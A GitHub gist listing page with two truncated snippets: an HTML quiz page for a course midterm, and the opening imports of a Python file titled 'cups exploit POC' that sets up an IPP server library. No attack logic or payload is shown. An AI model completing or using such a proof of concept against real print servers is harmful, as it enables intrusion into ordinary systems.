Skip to content

Instantly share code, notes, and snippets.

View NaiveInvestigator's full-sized avatar

NaiveInvestigator

View GitHub Profile
@NaiveInvestigator
NaiveInvestigator / midterm.html
Created July 27, 2025 17:51
For CSE389 midterms
<!DOCTYPE html>
<head>
<title>
wanna become a millionaire?
</title>
</head>
<body>
<table>
<tr><td id='question'></td> <tr>
<tr><td> <input type='checkbox' value = '' id = 'q0' name='quiz'></td> <tr>
@NaiveInvestigator
NaiveInvestigator / exploit.py
Created October 1, 2024 15:49
cups exploit POC
import socket
import threading
import time
import sys
from ippserver.server import IPPServer
import ippserver.behaviour as behaviour
from ippserver.server import IPPRequestHandler
from ippserver.constants import (